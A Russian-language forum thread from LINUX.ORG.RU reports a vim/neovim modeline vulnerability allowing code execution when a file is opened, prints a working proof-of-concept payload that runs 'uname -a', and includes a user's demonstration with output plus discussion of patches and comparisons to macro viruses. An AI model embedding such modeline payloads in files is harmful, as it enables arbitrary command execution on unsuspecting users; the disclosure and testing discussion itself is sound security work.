LINUX.ORG.RU

Уязвимость в vim

 ,


1

1

Опубликована уязвимость в текстовом редакторе vim, позволяющая исполнить произвольный код при открытии редактором текстового файла.

Вот текст файла выполняющего безобидный uname -a

:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

Исправление в виде добавленного вызова check_secure() уже доступно в репозиториях vim и neovim.

>>> Очень хорошее описание механизма уязвимости

★★

Проверено: Shaman007 ()
Последнее исправление: voronaam (всего исправлений: 1)
Ответ на: комментарий от otto

Получается уязвимость не в коде, а в настройках юзера. Т.е. это тоже самое, что отключить UAC в вин 8+... (про антивири молчу)
Да и вообще - вспомните макровирусы под МСофис

drfaust ★★★★★
()
Последнее исправление: drfaust (всего исправлений: 2)
Ответ на: комментарий от Aceler

ну эт действительно фишка. просто сделанная по принципу дебил - для дебилов, «система Витязь - я сделал, а вы - любитесь»

mumpster ★★★★★
()
Ответ на: комментарий от MrClon

хз в общем, у меня tiny стоит, может в этом дело:

#vim.tiny -u .vimrc SW/vim.bug тупо открывает тот шаблон как текст

mumpster ★★★★★
()
Последнее исправление: mumpster (всего исправлений: 3)
Ответ на: комментарий от mumpster

Эта «фишка» имела смысл во времена эпохи мульимедийных компьютеров, когда на CD-ROM физически нельзя было писать. Распространение её на перезаписываемые носители стало штатной уязвимостью, официальным каналом распространения вирусни.

Aceler ★★★★★
()
Ответ на: комментарий от ekzotech

Напиши команду чтобы в файл сохраняла. Что как маленький?

peregrine ★★★★★
()
Ответ на: комментарий от Aceler

не прав. у него своя ниша. просто должно было всплывать окно. сопсна UAC этим потом и занялся. я не собираюсь быть адвокатом дьявола эээ мелкомягких, просто определённый смысл в этом были есть.

mumpster ★★★★★
()
Ответ на: комментарий от Aceler

хз, я сильно этим вопросом не интересовался, тем более что не помню, что такое было это «klez». но вот что большая часть вирья тупо обламывалось на вайне - это я помню.

mumpster ★★★★★
()

Vim 8.1.1186

$ cat script.vim
#!/usr/bin/env vim

:!uname -a||" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

$ chmod +x script.vim
$ ./script.vim

Linux ASUS-A52F 5.0.7-arch1-1-ARCH #1 SMP PREEMPT Mon Apr 8 10:37:08 UTC 2019 x86_64 GNU/Linux

Press ENTER or type command to continue
Linux ASUS-A52F 5.0.7-arch1-1-ARCH #1 SMP PREEMPT Mon Apr 8 10:37:08 UTC 2019 x86_64 GNU/Linux

Press ENTER or type command to continue
Linux ASUS-A52F 5.0.7-arch1-1-ARCH #1 SMP PREEMPT Mon Apr 8 10:37:08 UTC 2019 x86_64 GNU/Linux

Press ENTER or type command to continue

А если нажать ENTER и затем нажать o в загрузившемся после исполнения «скрипта» редакторе, то можно очень сильно удивиться :D

EXL ★★★★★
()
Последнее исправление: EXL (всего исправлений: 1)
Ответ на: комментарий от EXL

А никто не пробовал накатывать VIM на PowerShell? Есть какая-то приблуда на офф-сайте с https-ом но приблуда неподписана и кажись ClamAV на него ругается на VirusTotal-e, что троян для винды там (если мне мозжечок не изменяет).

anonymous
()
Ответ на: комментарий от Turbid

у тебя возможно сборка не из master, там все работает

 ~  vim -v
NVIM v0.3.7
Build type: Release
...

 ~  apt policy neovim
neovim:
  Установлен: 0.3.7-1~ppa1~ubuntu16.04.6
  Кандидат:   0.3.7-1~ppa1~ubuntu16.04.6
  Таблица версий:
 *** 0.3.7-1~ppa1~ubuntu16.04.6 500
        500 http://ppa.launchpad.net/neovim-ppa/stable/ubuntu xenial/main amd64 Packages
        100 /var/lib/dpkg/status
mazdai ★★★
()
Последнее исправление: mazdai (всего исправлений: 1)
Ответ на: комментарий от mumpster

Ты сейчас серьёзно тупишь или просто троллишь?

Aceler ★★★★★
()
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.